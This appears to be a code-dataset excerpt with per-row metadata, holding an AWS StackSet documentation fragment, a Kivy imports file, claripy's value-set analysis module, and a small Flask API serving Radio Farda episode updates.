`AWSCloudFormationStackSetExecutionRole`. Name of the StackSet. The name must be unique in the region where you create your StackSet. The name can contain only alphanumeric characters (case-sensitive) and hyphens. It must start with an alphabetic character and cannot be longer than 128 characters. Key-value map of input parameters for the StackSet template. All template parameters, including those with a `Default`, must be configured or ignored with `lifecycle` configuration block `ignore_changes` argument. All `NoEcho` template parameters must be ignored with the `lifecycle` configuration block `ignore_changes` argument. Unique identifier of the StackSet. Key-value map of tags to associate with this StackSet and the Stacks created from it. AWS CloudFormation also propagates these tags to supported resources that are created in the Stacks. A maximum number of 50 tags can be specified. String containing the CloudFormation template body. Maximum size: 51,200 bytes. Conflicts with `template_url`. String containing the location of a file containing the CloudFormation template body. The URL must point to a template that is located in an Amazon S3 bucket. Maximum location file size: 460,800 bytes. Conflicts with `template_body`. | 1.63394 | 2 |
code/config/imports.py | farioso-fernando/cover-meu-beat | 0 | 8068 | from kivy.uix.screenmanager import ScreenManager
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.animation import Animation
from kivy.core.window import Window
from kivymd.app import MDApp
import kivymd
import kivy
print(
)
def version():
kivy.require('2.0.0')
print(
) | from kivy.uix.screenmanager import ScreenManager
from kivy.uix.boxlayout import BoxLayout
from kivy.lang.builder import Builder
from kivy.animation import Animation
from kivy.core.window import Window
from kivymd.app import MDApp
import kivymd
import kivy
print(
)
def version():
kivy.require('2.0.0')
print(
) | none | 1 | 1.761887 | 2 |
|
claripy/vsa/valueset.py | kwalberg/claripy | 0 | 8069 | import functools
import itertools
import numbers
from ..backend_object import BackendObject
from ..annotation import Annotation
def normalize_types_two_args(f):
@functools.wraps(f)
def normalizer(self, region, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
if not isinstance(o, StridedInterval):
raise ClaripyVSAOperationError('Unsupported operand type %s' % type(o))
return f(self, region, o)
return normalizer
def normalize_types_one_arg(f):
@functools.wraps(f)
def normalizer(self, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
return f(self, o)
return normalizer
vs_id_ctr = itertools.count()
class RegionAnnotation(Annotation):
"""
Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet.
Note that Annotation objects are immutable. Do not change properties of an Annotation object without creating a new
one.
"""
def __init__(self, region_id, region_base_addr, offset):
self.region_id = region_id
self.region_base_addr = region_base_addr
self.offset = offset
# Do necessary conversion here
if isinstance(self.region_base_addr, Base):
self.region_base_addr = self.region_base_addr._model_vsa
if isinstance(self.offset, Base):
self.offset = self.offset._model_vsa
@property
def eliminatable(self):
"""
A Region annotation is not eliminatable in simplifications.
:return: False
:rtype: bool
"""
return False
@property
def relocatable(self):
"""
A Region annotation is not relocatable in simplifications.
:return: False
:rtype: bool
"""
return False
#
# Public methods
#
def relocate(self, src, dst):
"""
Override Annotation.relocate().
:param src: The old AST
:param dst: The new AST, as the result of a simplification
:return: The new annotation that should be applied on the new AST
"""
raise ClaripyVSAError('RegionAnnotation is not relocatable')
#
# Overriding base methods
#
def __hash__(self):
return hash((self.region_id, self.region_base_addr, hash(self.offset)))
def __repr__(self):
return "<RegionAnnotation %s:%#08x>" % (self.region_id, self.offset)
class ValueSet(BackendObject):
"""
ValueSet is a mapping between memory regions and corresponding offsets.
"""
def __init__(self, name=None, region=None, region_base_addr=None, bits=None, val=None):
"""
Constructor.
:param str name: Name of this ValueSet object. Only for debugging purposes.
:param str region: Region ID.
:param int region_base_addr: Base address of the region.
:param int bits: Size of the ValueSet.
:param val: an initial offset
"""
self._name = 'VS_%d' % next(vs_id_ctr) if name is None else name
if bits is None:
raise ClaripyVSAError('bits must be specified when creating a ValueSet.')
self._bits = bits
self._si = StridedInterval.empty(bits)
self._regions = {}
self._region_base_addrs = {}
self._reversed = False
# Shortcuts for initialization
# May not be useful though...
if region is not None and region_base_addr is not None and val is not None:
if isinstance(region_base_addr, numbers.Number):
# Convert it to a StridedInterval
region_base_addr = StridedInterval(bits=self._bits, stride=1,
lower_bound=region_base_addr,
upper_bound=region_base_addr)
if isinstance(val, numbers.Number):
val = StridedInterval(bits=bits, stride=0, lower_bound=val, upper_bound=val)
if isinstance(val, StridedInterval):
self._set_si(region, region_base_addr, val)
else:
raise ClaripyVSAError("Unsupported type '%s' for argument 'val'" % type(val))
else:
if region is not None or val is not None:
raise ClaripyVSAError("You must specify 'region' and 'val' at the same time.")
#
# Properties
#
@property
def name(self):
return self._name
@property
def bits(self):
return self._bits
@property
def regions(self):
return self._regions
@property
def reversed(self):
return self._reversed
@property
def unique(self):
return len(self.regions) == 1 and self.regions.values()[0].unique
@property
def cardinality(self):
card = 0
for region in self._regions:
card += self._regions[region].cardinality
return card
@property
def is_empty(self):
return len(self._regions) == 0
@property
def valueset(self):
return self
#
# Private methods
#
def _set_si(self, region, region_base_addr, si):
if isinstance(si, numbers.Number):
si = StridedInterval(bits=self.bits, stride=0, lower_bound=si, upper_bound=si)
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if not isinstance(si, StridedInterval):
raise ClaripyVSAOperationError('Unsupported type %s for si' % type(si))
self._regions[region] = si
self._region_base_addrs[region] = region_base_addr
self._si = self._si.union(region_base_addr + si)
def _merge_si(self, region, region_base_addr, si):
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if region not in self._regions:
self._set_si(region, region_base_addr, si)
else:
self._regions[region] = self._regions[region].union(si)
self._region_base_addrs[region] = self._region_base_addrs[region].union(region_base_addr)
self._si = self._si.union(region_base_addr + si)
#
# Public methods
#
@staticmethod
def empty(bits):
return ValueSet(bits=bits)
def items(self):
return self._regions.items()
def size(self):
return len(self)
def copy(self):
"""
Make a copy of self and return.
:return: A new ValueSet object.
:rtype: ValueSet
"""
vs = ValueSet(bits=self.bits)
vs._regions = self._regions.copy()
vs._region_base_addrs = self._region_base_addrs.copy()
vs._reversed = self._reversed
vs._si = self._si.copy()
return vs
def get_si(self, region):
if region in self._regions:
return self._regions[region]
# TODO: Should we return a None, or an empty SI instead?
return None
def stridedinterval(self):
return self._si
def apply_annotation(self, annotation):
"""
Apply a new annotation onto self, and return a new ValueSet object.
:param RegionAnnotation annotation: The annotation to apply.
:return: A new ValueSet object
:rtype: ValueSet
"""
vs = self.copy()
vs._merge_si(annotation.region_id, annotation.region_base_addr, annotation.offset)
return vs
def __repr__(self):
s = ""
for region, si in self._regions.items():
s = "%s: %s" % (region, si)
return "(" + s + ")"
def __len__(self):
return self._bits
def __hash__(self):
return hash(tuple((r, hash(self._regions[r])) for r in self._regions))
#
# Arithmetic operations
#
@normalize_types_one_arg
def __add__(self, other):
"""
Binary operation: addition
Note that even if "other" is a ValueSet object. we still treat it as a StridedInterval. Adding two ValueSets
together does not make sense (which is essentially adding two pointers together).
:param StridedInterval other: The other operand.
:return: A new ValueSet object
:rtype: ValueSet
"""
new_vs = ValueSet(bits=self.bits)
# Call __add__ on self._si
new_vs._si = self._si.__add__(other)
for region in self._regions:
new_vs._regions[region] = self._regions[region] + other
return new_vs
@normalize_types_one_arg
def __radd__(self, other):
return self.__add__(other)
@normalize_types_one_arg
def __sub__(self, other):
"""
Binary operation: subtraction
:param other: The other operand
:return: A StridedInterval or a ValueSet.
"""
deltas = [ ]
# TODO: Handle more cases
if isinstance(other, ValueSet):
# A subtraction between two ValueSets produces a StridedInterval
if self.regions.keys() == other.regions.keys():
for region in self._regions:
deltas.append(self._regions[region] - other._regions[region])
else:
# TODO: raise the proper exception here
raise NotImplementedError()
delta = StridedInterval.empty(self.bits)
for d in deltas:
delta = delta.union(d)
return delta
else:
# A subtraction between a ValueSet and a StridedInterval produces another ValueSet
new_vs = self.copy()
# Call __sub__ on the base class
new_vs._si = self._si.__sub__(other)
for region, si in new_vs._regions.items():
new_vs._regions[region] = si - other
return new_vs
@normalize_types_one_arg
def __and__(self, other):
"""
Binary operation: and
Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between
two pointers that are not the same do not make sense.
:param other: The other operand
:return: A ValueSet as the result
:rtype: ValueSet
"""
if type(other) is ValueSet:
# The only case where calling & between two points makes sense
if self.identical(other):
return self.copy()
if BoolResult.is_true(other == 0):
# Corner case: a & 0 = 0
return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0)
if BoolResult.is_true(other < 0x100):
# Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not
# We return a StridedInterval instead
ret = None
for region, si in self._regions.items():
r = si.__and__(other)
ret = r if ret is None else ret.union(r)
return ret
else:
# We should return a ValueSet here
new_vs = self.copy()
for region, si in self._regions.items():
r = si.__and__(other)
new_vs._regions[region] = r
return new_vs
def __eq__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
if isinstance(other, ValueSet):
same = False
different = False
for region, si in other.regions.items():
if region in self.regions:
comp_ret = self.regions[region] == si
if BoolResult.has_true(comp_ret):
same = True
if BoolResult.has_false(comp_ret):
different = True
else:
different = True
if same and not different:
return TrueResult()
if same and different:
return MaybeResult()
return FalseResult()
elif isinstance(other, StridedInterval):
if 'global' in self.regions:
return self.regions['global'] == other
else:
return FalseResult()
else:
return FalseResult()
def __ne__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
return ~ (self == other)
#
# Backend operations
#
def eval(self, n, signed=False):
if signed:
# How are you going to deal with a negative pointer?
raise ClaripyVSAOperationError('`signed` cannot be True when calling ValueSet.eval().')
results = []
for _, si in self._regions.items():
if len(results) < n:
results.extend(si.eval(n))
return results
@property
def min(self):
"""
The minimum integer value of a value-set. It is only defined when there is exactly one region.
:return: A integer that represents the minimum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'min()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).min
@property
def max(self):
"""
The maximum integer value of a value-set. It is only defined when there is exactly one region.
:return: A integer that represents the maximum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'max()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).max
def reverse(self):
# TODO: obviously valueset.reverse is not properly implemented. I'm disabling the old annoying output line for
# TODO: now. I will implement the proper reversing support soon.
vs = self.copy()
vs._reversed = not vs._reversed
return vs
def extract(self, high_bit, low_bit):
"""
Operation extract
- A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a
ValueSet instance. Otherwise a StridedInterval is returned.
:param high_bit:
:param low_bit:
:return: A ValueSet or a StridedInterval
"""
if high_bit - low_bit + 1 == self.bits:
return self.copy()
if ('global' in self._regions and len(self._regions.keys()) > 1) or \
len(self._regions.keys()) > 0:
si_ret = StridedInterval.top(high_bit - low_bit + 1)
else:
if 'global' in self._regions:
si = self._regions['global']
si_ret = si.extract(high_bit, low_bit)
else:
si_ret = StridedInterval.empty(high_bit - low_bit + 1)
return si_ret
def concat(self, b):
new_vs = ValueSet(bits=self.bits + b.bits)
# TODO: This logic is obviously flawed. Correct it later :-(
if isinstance(b, StridedInterval):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b))
elif isinstance(b, ValueSet):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b.get_si(region)))
else:
raise ClaripyVSAOperationError('ValueSet.concat() got an unsupported operand %s (type %s)' % (b, type(b)))
return new_vs
@normalize_types_one_arg
def union(self, b):
merged_vs = self.copy()
if type(b) is ValueSet:
for region, si in b.regions.items():
if region not in merged_vs._regions:
merged_vs._regions[region] = si
else:
merged_vs._regions[region] = merged_vs._regions[region].union(si)
merged_vs._si = merged_vs._si.union(b._si)
else:
for region, si in merged_vs._regions.items():
merged_vs._regions[region] = merged_vs._regions[region].union(b)
merged_vs._si = merged_vs._si.union(b)
return merged_vs
@normalize_types_one_arg
def widen(self, b):
merged_vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in merged_vs.regions:
merged_vs.regions[region] = si
else:
merged_vs.regions[region] = merged_vs.regions[region].widen(si)
merged_vs._si = merged_vs._si.widen(b._si)
else:
for region in merged_vs._regions:
merged_vs._regions[region] = merged_vs._regions[region].widen(b)
merged_vs._si = merged_vs._si.widen(b)
return merged_vs
@normalize_types_one_arg
def intersection(self, b):
vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in vs.regions:
pass
else:
vs.regions[region] = vs.regions[region].intersection(si)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b._si)
else:
for region in self._regions:
vs.regions[region] = vs.regions[region].intersection(b)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b)
return vs
def identical(self, o):
"""
Used to make exact comparisons between two ValueSets.
:param o: The other ValueSet to compare with.
:return: True if they are exactly same, False otherwise.
"""
if self._reversed != o._reversed:
return False
for region, si in self.regions.items():
if region in o.regions:
o_si = o.regions[region]
if not si.identical(o_si):
return False
else:
return False
return True
from ..ast.base import Base
from .strided_interval import StridedInterval
from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult
from .errors import ClaripyVSAOperationError, ClaripyVSAError
from ..errors import ClaripyValueError
| import functools
import itertools
import numbers
from ..backend_object import BackendObject
from ..annotation import Annotation
def normalize_types_two_args(f):
@functools.wraps(f)
def normalizer(self, region, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
if not isinstance(o, StridedInterval):
raise ClaripyVSAOperationError('Unsupported operand type %s' % type(o))
return f(self, region, o)
return normalizer
def normalize_types_one_arg(f):
@functools.wraps(f)
def normalizer(self, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
return f(self, o)
return normalizer
vs_id_ctr = itertools.count()
class RegionAnnotation(Annotation):
"""
Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet.
Note that Annotation objects are immutable. Do not change properties of an Annotation object without creating a new
one.
"""
def __init__(self, region_id, region_base_addr, offset):
self.region_id = region_id
self.region_base_addr = region_base_addr
self.offset = offset
# Do necessary conversion here
if isinstance(self.region_base_addr, Base):
self.region_base_addr = self.region_base_addr._model_vsa
if isinstance(self.offset, Base):
self.offset = self.offset._model_vsa
@property
def eliminatable(self):
"""
A Region annotation is not eliminatable in simplifications.
:return: False
:rtype: bool
"""
return False
@property
def relocatable(self):
"""
A Region annotation is not relocatable in simplifications.
:return: False
:rtype: bool
"""
return False
#
# Public methods
#
def relocate(self, src, dst):
"""
Override Annotation.relocate().
:param src: The old AST
:param dst: The new AST, as the result of a simplification
:return: The new annotation that should be applied on the new AST
"""
raise ClaripyVSAError('RegionAnnotation is not relocatable')
#
# Overriding base methods
#
def __hash__(self):
return hash((self.region_id, self.region_base_addr, hash(self.offset)))
def __repr__(self):
return "<RegionAnnotation %s:%#08x>" % (self.region_id, self.offset)
class ValueSet(BackendObject):
"""
ValueSet is a mapping between memory regions and corresponding offsets.
"""
def __init__(self, name=None, region=None, region_base_addr=None, bits=None, val=None):
"""
Constructor.
:param str name: Name of this ValueSet object. Only for debugging purposes.
:param str region: Region ID.
:param int region_base_addr: Base address of the region.
:param int bits: Size of the ValueSet.
:param val: an initial offset
"""
self._name = 'VS_%d' % next(vs_id_ctr) if name is None else name
if bits is None:
raise ClaripyVSAError('bits must be specified when creating a ValueSet.')
self._bits = bits
self._si = StridedInterval.empty(bits)
self._regions = {}
self._region_base_addrs = {}
self._reversed = False
# Shortcuts for initialization
# May not be useful though...
if region is not None and region_base_addr is not None and val is not None:
if isinstance(region_base_addr, numbers.Number):
# Convert it to a StridedInterval
region_base_addr = StridedInterval(bits=self._bits, stride=1,
lower_bound=region_base_addr,
upper_bound=region_base_addr)
if isinstance(val, numbers.Number):
val = StridedInterval(bits=bits, stride=0, lower_bound=val, upper_bound=val)
if isinstance(val, StridedInterval):
self._set_si(region, region_base_addr, val)
else:
raise ClaripyVSAError("Unsupported type '%s' for argument 'val'" % type(val))
else:
if region is not None or val is not None:
raise ClaripyVSAError("You must specify 'region' and 'val' at the same time.")
#
# Properties
#
@property
def name(self):
return self._name
@property
def bits(self):
return self._bits
@property
def regions(self):
return self._regions
@property
def reversed(self):
return self._reversed
@property
def unique(self):
return len(self.regions) == 1 and self.regions.values()[0].unique
@property
def cardinality(self):
card = 0
for region in self._regions:
card += self._regions[region].cardinality
return card
@property
def is_empty(self):
return len(self._regions) == 0
@property
def valueset(self):
return self
#
# Private methods
#
def _set_si(self, region, region_base_addr, si):
if isinstance(si, numbers.Number):
si = StridedInterval(bits=self.bits, stride=0, lower_bound=si, upper_bound=si)
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if not isinstance(si, StridedInterval):
raise ClaripyVSAOperationError('Unsupported type %s for si' % type(si))
self._regions[region] = si
self._region_base_addrs[region] = region_base_addr
self._si = self._si.union(region_base_addr + si)
def _merge_si(self, region, region_base_addr, si):
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if region not in self._regions:
self._set_si(region, region_base_addr, si)
else:
self._regions[region] = self._regions[region].union(si)
self._region_base_addrs[region] = self._region_base_addrs[region].union(region_base_addr)
self._si = self._si.union(region_base_addr + si)
#
# Public methods
#
@staticmethod
def empty(bits):
return ValueSet(bits=bits)
def items(self):
return self._regions.items()
def size(self):
return len(self)
def copy(self):
"""
Make a copy of self and return.
:return: A new ValueSet object.
:rtype: ValueSet
"""
vs = ValueSet(bits=self.bits)
vs._regions = self._regions.copy()
vs._region_base_addrs = self._region_base_addrs.copy()
vs._reversed = self._reversed
vs._si = self._si.copy()
return vs
def get_si(self, region):
if region in self._regions:
return self._regions[region]
# TODO: Should we return a None, or an empty SI instead?
return None
def stridedinterval(self):
return self._si
def apply_annotation(self, annotation):
"""
Apply a new annotation onto self, and return a new ValueSet object.
:param RegionAnnotation annotation: The annotation to apply.
:return: A new ValueSet object
:rtype: ValueSet
"""
vs = self.copy()
vs._merge_si(annotation.region_id, annotation.region_base_addr, annotation.offset)
return vs
def __repr__(self):
s = ""
for region, si in self._regions.items():
s = "%s: %s" % (region, si)
return "(" + s + ")"
def __len__(self):
return self._bits
def __hash__(self):
return hash(tuple((r, hash(self._regions[r])) for r in self._regions))
#
# Arithmetic operations
#
@normalize_types_one_arg
def __add__(self, other):
"""
Binary operation: addition
Note that even if "other" is a ValueSet object. we still treat it as a StridedInterval. Adding two ValueSets
together does not make sense (which is essentially adding two pointers together).
:param StridedInterval other: The other operand.
:return: A new ValueSet object
:rtype: ValueSet
"""
new_vs = ValueSet(bits=self.bits)
# Call __add__ on self._si
new_vs._si = self._si.__add__(other)
for region in self._regions:
new_vs._regions[region] = self._regions[region] + other
return new_vs
@normalize_types_one_arg
def __radd__(self, other):
return self.__add__(other)
@normalize_types_one_arg
def __sub__(self, other):
"""
Binary operation: subtraction
:param other: The other operand
:return: A StridedInterval or a ValueSet.
"""
deltas = [ ]
# TODO: Handle more cases
if isinstance(other, ValueSet):
# A subtraction between two ValueSets produces a StridedInterval
if self.regions.keys() == other.regions.keys():
for region in self._regions:
deltas.append(self._regions[region] - other._regions[region])
else:
# TODO: raise the proper exception here
raise NotImplementedError()
delta = StridedInterval.empty(self.bits)
for d in deltas:
delta = delta.union(d)
return delta
else:
# A subtraction between a ValueSet and a StridedInterval produces another ValueSet
new_vs = self.copy()
# Call __sub__ on the base class
new_vs._si = self._si.__sub__(other)
for region, si in new_vs._regions.items():
new_vs._regions[region] = si - other
return new_vs
@normalize_types_one_arg
def __and__(self, other):
"""
Binary operation: and
Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between
two pointers that are not the same do not make sense.
:param other: The other operand
:return: A ValueSet as the result
:rtype: ValueSet
"""
if type(other) is ValueSet:
# The only case where calling & between two points makes sense
if self.identical(other):
return self.copy()
if BoolResult.is_true(other == 0):
# Corner case: a & 0 = 0
return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0)
if BoolResult.is_true(other < 0x100):
# Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not
# We return a StridedInterval instead
ret = None
for region, si in self._regions.items():
r = si.__and__(other)
ret = r if ret is None else ret.union(r)
return ret
else:
# We should return a ValueSet here
new_vs = self.copy()
for region, si in self._regions.items():
r = si.__and__(other)
new_vs._regions[region] = r
return new_vs
def __eq__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
if isinstance(other, ValueSet):
same = False
different = False
for region, si in other.regions.items():
if region in self.regions:
comp_ret = self.regions[region] == si
if BoolResult.has_true(comp_ret):
same = True
if BoolResult.has_false(comp_ret):
different = True
else:
different = True
if same and not different:
return TrueResult()
if same and different:
return MaybeResult()
return FalseResult()
elif isinstance(other, StridedInterval):
if 'global' in self.regions:
return self.regions['global'] == other
else:
return FalseResult()
else:
return FalseResult()
def __ne__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
return ~ (self == other)
#
# Backend operations
#
def eval(self, n, signed=False):
if signed:
# How are you going to deal with a negative pointer?
raise ClaripyVSAOperationError('`signed` cannot be True when calling ValueSet.eval().')
results = []
for _, si in self._regions.items():
if len(results) < n:
results.extend(si.eval(n))
return results
@property
def min(self):
"""
The minimum integer value of a value-set. It is only defined when there is exactly one region.
:return: A integer that represents the minimum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'min()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).min
@property
def max(self):
"""
The maximum integer value of a value-set. It is only defined when there is exactly one region.
:return: A integer that represents the maximum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'max()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).max
def reverse(self):
# TODO: obviously valueset.reverse is not properly implemented. I'm disabling the old annoying output line for
# TODO: now. I will implement the proper reversing support soon.
vs = self.copy()
vs._reversed = not vs._reversed
return vs
def extract(self, high_bit, low_bit):
"""
Operation extract
- A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a
ValueSet instance. Otherwise a StridedInterval is returned.
:param high_bit:
:param low_bit:
:return: A ValueSet or a StridedInterval
"""
if high_bit - low_bit + 1 == self.bits:
return self.copy()
if ('global' in self._regions and len(self._regions.keys()) > 1) or \
len(self._regions.keys()) > 0:
si_ret = StridedInterval.top(high_bit - low_bit + 1)
else:
if 'global' in self._regions:
si = self._regions['global']
si_ret = si.extract(high_bit, low_bit)
else:
si_ret = StridedInterval.empty(high_bit - low_bit + 1)
return si_ret
def concat(self, b):
new_vs = ValueSet(bits=self.bits + b.bits)
# TODO: This logic is obviously flawed. Correct it later :-(
if isinstance(b, StridedInterval):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b))
elif isinstance(b, ValueSet):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b.get_si(region)))
else:
raise ClaripyVSAOperationError('ValueSet.concat() got an unsupported operand %s (type %s)' % (b, type(b)))
return new_vs
@normalize_types_one_arg
def union(self, b):
merged_vs = self.copy()
if type(b) is ValueSet:
for region, si in b.regions.items():
if region not in merged_vs._regions:
merged_vs._regions[region] = si
else:
merged_vs._regions[region] = merged_vs._regions[region].union(si)
merged_vs._si = merged_vs._si.union(b._si)
else:
for region, si in merged_vs._regions.items():
merged_vs._regions[region] = merged_vs._regions[region].union(b)
merged_vs._si = merged_vs._si.union(b)
return merged_vs
@normalize_types_one_arg
def widen(self, b):
merged_vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in merged_vs.regions:
merged_vs.regions[region] = si
else:
merged_vs.regions[region] = merged_vs.regions[region].widen(si)
merged_vs._si = merged_vs._si.widen(b._si)
else:
for region in merged_vs._regions:
merged_vs._regions[region] = merged_vs._regions[region].widen(b)
merged_vs._si = merged_vs._si.widen(b)
return merged_vs
@normalize_types_one_arg
def intersection(self, b):
vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in vs.regions:
pass
else:
vs.regions[region] = vs.regions[region].intersection(si)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b._si)
else:
for region in self._regions:
vs.regions[region] = vs.regions[region].intersection(b)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b)
return vs
def identical(self, o):
"""
Used to make exact comparisons between two ValueSets.
:param o: The other ValueSet to compare with.
:return: True if they are exactly same, False otherwise.
"""
if self._reversed != o._reversed:
return False
for region, si in self.regions.items():
if region in o.regions:
o_si = o.regions[region]
if not si.identical(o_si):
return False
else:
return False
return True
from ..ast.base import Base
from .strided_interval import StridedInterval
from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult
from .errors import ClaripyVSAOperationError, ClaripyVSAError
from ..errors import ClaripyValueError
| en | 0.811738 | Convert any object to an object that we can process. Convert any object to an object that we can process. Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet. Note that Annotation objects are immutable. Do not change properties of an Annotation object without creating a new one. # Do necessary conversion here A Region annotation is not eliminatable in simplifications. :return: False :rtype: bool A Region annotation is not relocatable in simplifications. :return: False :rtype: bool # # Public methods # Override Annotation.relocate(). :param src: The old AST :param dst: The new AST, as the result of a simplification :return: The new annotation that should be applied on the new AST # # Overriding base methods # #08x>" % (self.region_id, self.offset) ValueSet is a mapping between memory regions and corresponding offsets. Constructor. :param str name: Name of this ValueSet object. Only for debugging purposes. :param str region: Region ID. :param int region_base_addr: Base address of the region. :param int bits: Size of the ValueSet. :param val: an initial offset # Shortcuts for initialization # May not be useful though... # Convert it to a StridedInterval # # Properties # # # Private methods # # # Public methods # Make a copy of self and return. :return: A new ValueSet object. :rtype: ValueSet # TODO: Should we return a None, or an empty SI instead? Apply a new annotation onto self, and return a new ValueSet object. :param RegionAnnotation annotation: The annotation to apply. :return: A new ValueSet object :rtype: ValueSet # # Arithmetic operations # Binary operation: addition Note that even if "other" is a ValueSet object. we still treat it as a StridedInterval. Adding two ValueSets together does not make sense (which is essentially adding two pointers together). :param StridedInterval other: The other operand. :return: A new ValueSet object :rtype: ValueSet # Call __add__ on self._si Binary operation: subtraction :param other: The other operand :return: A StridedInterval or a ValueSet. # TODO: Handle more cases # A subtraction between two ValueSets produces a StridedInterval # TODO: raise the proper exception here # A subtraction between a ValueSet and a StridedInterval produces another ValueSet # Call __sub__ on the base class Binary operation: and Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between two pointers that are not the same do not make sense. :param other: The other operand :return: A ValueSet as the result :rtype: ValueSet # The only case where calling & between two points makes sense # Corner case: a & 0 = 0 # Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not # We return a StridedInterval instead # We should return a ValueSet here Binary operation: == :param other: The other operand :return: True/False/Maybe Binary operation: == :param other: The other operand :return: True/False/Maybe # # Backend operations # # How are you going to deal with a negative pointer? The minimum integer value of a value-set. It is only defined when there is exactly one region. :return: A integer that represents the minimum integer value of this value-set. :rtype: int The maximum integer value of a value-set. It is only defined when there is exactly one region. :return: A integer that represents the maximum integer value of this value-set. :rtype: int # TODO: obviously valueset.reverse is not properly implemented. I'm disabling the old annoying output line for # TODO: now. I will implement the proper reversing support soon. Operation extract - A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a ValueSet instance. Otherwise a StridedInterval is returned. :param high_bit: :param low_bit: :return: A ValueSet or a StridedInterval # TODO: This logic is obviously flawed. Correct it later :-( Used to make exact comparisons between two ValueSets. :param o: The other ValueSet to compare with. :return: True if they are exactly same, False otherwise. | 2.622855 | 3 |
fardaastationapi.py | sina-cb/fardaastationapi | 0 | 8070 | import logging
from episodes import find_updates, db, count_all
from logging import error as logi
from flask import Flask, jsonify, request
def create_app(config, debug=False, testing=False, config_overrides=None):
app = Flask(__name__)
app.config.from_object(config)
app.config['JSON_AS_ASCII'] = False
app.debug = debug
app.testing = testing
if config_overrides:
app.config.update(config_overrides)
# Configure logging
if not app.testing:
logging.basicConfig(level=logging.INFO)
@app.before_request
def before_request():
db.connect()
@app.after_request
def after_request(response):
db.close()
return response
@app.route('/get_new_episodes')
def get_new_episodes():
appengine_request = request.headers.get('X-Appengine-Cron')
if appengine_request == 'true':
from scraper import update_episodes
update_episodes()
return '<h1>Success</h1>'
else:
return '<h1>This is a crobjob and all the requests should come from appengine.</h1>'
@app.route('/get_updates')
def get_update():
timestamp = request.args.get('timestamp', '')
if timestamp == '':
logi('Default timestamp')
timestamp = 0
else:
timestamp = long(timestamp)
result = find_updates(timestamp)
return jsonify(result)
@app.route('/')
def welcome():
message = '{}{}{}{}'.format('<h1>Welcome to FardaStationAPI WebService</h1>',
'<p>To get information about the latest episodes of Fardaa Station (by '
'RadioFarda.com) please send a GET request to '
'http://fardastationapi.appspot.com/get_updates URL.</p>',
'<p>A UNIX epoch timestamp can also be passed in as an argument to filter out the '
'episodes before that timestamp. Example: '
'https://fardastationapi.appspot.com/get_updates?timestamp=1512629949</p>',
'<h1>Current number of episodes: {}</h1>'.format(count_all()))
return message
# Add an error handler. This is useful for debugging the live application,
# however, you should disable the output of the exception for production
# applications.
